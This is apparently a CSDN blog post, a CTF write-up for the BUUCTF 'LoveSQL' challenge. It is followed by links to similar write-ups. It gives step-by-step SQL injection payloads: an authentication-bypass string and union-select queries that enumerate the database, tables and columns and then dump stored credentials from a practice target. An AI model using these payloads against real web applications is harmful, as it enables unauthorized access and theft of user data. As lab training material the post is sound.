[极客大挑战 2019]LoveSQL

最新推荐文章于 2024-10-08 15:41:48 发布

Lnre

最新推荐文章于 2024-10-08 15:41:48 发布

阅读量37

点赞数

文章标签：数据库网络安全

本文链接：https://blog.csdn.net/2302_80059204/article/details/134957872

版权

[极客大挑战 2019]LoveSQL

打开靶机之后，输入一个万能密码

       admin’ or 1=1#

       1                //密码随意

明显的是一道SQL注入题，直接开始判读字段数，不过要留意一下该网址在check.php文件下执行，注意语法格式，其中由于在Url中输入，#应用Url编码格式%23

/check.php?username=admin' order by 3%23&password=1

尝试之后得到字段是3

查看回显

/check.php?username=1' union select 1,2,3%23&password=1

得到回显点位是3，查询该点位的库名

/check.php?username=1' union select 1,2,database()%23&password=1

得到库名是geek，开始爆表

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

得到表名之后，开始爆列

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

最后，报数据即可

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

查看页面源码

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Lnre

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

BUUCTF WEB 极客大挑战 2019 LoveSQL

Ethan552525的博客

07-27

550

题目：解题： 1：输入万能密码用户名：admin' or 1=1# 密码：1 2：确定回显列用户名：1' union select 1,2,3;# （select 1,2...逐步增加，直到不报错即得到正确的列数）密码：1 说明查询列数为3，回显列为2，3。 UNION 操作符用于合并两个或多个 SELECT 语句的结果集。 ...

[极客大挑战 2019]LoveSQL1

weixin_41571993的博客

10-04

379

靶场练习

参与评论您还未登录，请先登录后发表或查看评论

[极客大挑战 2019]LoveSQL 1

xixixihan的博客

11-23

332

sql题练习

【极客大挑战2019】LoveSQL解题

Bird&Bird

10-25

2233

1、打开靶机：BUUCTF在线评测，选择web---->【极客大挑战2019】LoveSQL 打开被测试站点，是这个样子的，是上一题EasySQL的延续。 2、EasySQL那道题采用万能密码，我们也直接使用万能密码试一下，结果如下：直接给出了密码。使用正确的用户名和密码登录一下，结果还是那使用MD5库碰撞一下，结果也没碰撞出来。 3、继续寻常注入吧。爆破有多少列（字段数） username=admin&password=6ec1cab79005129..

极客大挑战 2019 lovesql wp

arcuied

11-21

492

极客大挑战 2019 lovesql wp

BUUCTF Web [极客大挑战 2019]LoveSQL

热门推荐

wangyuxiang946的博客

10-27

1万+

「作者主页」：士别三日wyx 此文章已录入专栏《网络攻防》，持续更新热门靶场的通关教程「未知攻，焉知收」，在一个个孤独的夜晚，你完成了几百个攻防实验，回过头来才发现，已经击败了百分之九十九的同期选手。一、题目简介进入题目连接是一个「登录」界面登录「成功」会显示当前用户的账号和密码登录「失败」则会则会提示错误的用户名和密码二、思路分析这一关是「SQL注入」漏洞，注入点.

buu [极客大挑战 2019]LoveSQL 1

weixin_45642610的博客

01-10

1924

buu [极客大挑战 2019]LoveSQL 1 -刷题个人日记小白一个，写给自己看。进去后是这样：用户名输入1和1'测试发现1'报错有sql语法错误，说明有sql注入点且后台数据库是MariaDB 用户名输入sql注入基本公式：1' or 1=1;# 结果： 3bba40d66c98e28cf3bac11b45edbbab像是md5编码，试试解码后不行。可能flag在其他表里，我们要知道有哪些表且表的属性有哪些。慢慢来，payload： check.php?username=admin'

[极客大挑战 2019]LoveSQL 1（SQL注入）

小谢的博客

06-12

4994

[极客大挑战 2019]LoveSQL 1（SQL注入）

【极客大挑战2019LoveSQL】

qq_45927819的博客

09-12

241

题目地址：http://b7f87fb9-2d9b-47f3-8c81-31d54bda9fe7.node3.buuoj.cn 看到需要账户和密码直接采用万能钥匙来试一下。 admin’ or 1=1# 密码随便填就可以登陆成功了判断列数： > /check.php ?username=1' order by 3%23&password=1 没有报错，只是账户密码错误当到order by 4 时报错了所以判断出有三个列数。联合查询爆数据库 /check.php ?userna

BUUCTF系列 // [极客大挑战 2019] LoveSQL

qq_45805420的博客

10-03

553

前言本题知识点：SQL注入 WP （这题居然是个连续剧。。。）首先尝试使用上一题的解法绕过看看(上一题 WP 的传送门)，结果如下：注意到密码有些奇怪，尝试着用 MD5 解码失败，也没啥思路（最后事实证明确实也用不到这玩意），故回到 SQL 注入上面来寻找突破 1、查询字段数 ...?username=admin'order by 列数#&password=123 // #号需要手动进行 URL 编码即替换成 %23 可知共有3个字段 2、测试注入点接着使用联合查询寻找注入点即回显

【学习笔记 25】 buu [极客大挑战 2019]LoveSQL

weixin_43553654的博客

07-27

325

0x00 知识点 1.利用常用万能密码登录 2.利用union构造联合注入得到flag 0x01 解题思路 1.打开网站，映入眼帘的就是一个登录界面，并且网页头上有一行小字，说是不让用sqlmap跑，那我偏要试试，但是现在还找不到注入点，继续进行，等下再试。这时在查看源码时发现验证的check.php页面和get的传参方式，直接访问check.php网页什么重要信息都没，那继续回到原网页利用常用的万能密码进行登录测试。这里用到的是用户名：admin'/* 密码：*/' 登录成功。发现被蓝色圈圈出

BUUCTF__[极客大挑战 2019]LoveSQL_题解

风过江南乱的博客

06-19

1203

前言很好，考完了死亡高数和大物，虽然还没考完，不过艰难的已经过去了，感觉神清气爽，水一题。 u1s1，线上考试=在海里考试。读题嗯，还是熟悉的背景图，好几题都是这个师傅出的sql注入。首先很容易试出为单引号字符型闭合,输入 1、1"、1’ , 在1’时报错然后尝试注入，发现，好像没有过滤，连 union 联合注入都能使用，并且很容易得到数据库名称,得到数据库名称geek 但在此之前，先得到列数为3，不是3则提示报错然后，基本操作得到表信息，有两个表geekuser和l0ve1ysq

极客大挑战 2019]LoveSQL 1

08-24

LoveSQL 1是极客大挑战2019的一个题目，它是一个关于 SQL 查询语言的挑战。具体来说，LoveSQL 1要求参赛者编写一个 SQL 查询，从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...

鲁班到家上门安装维修系统源码开发之结构功能解析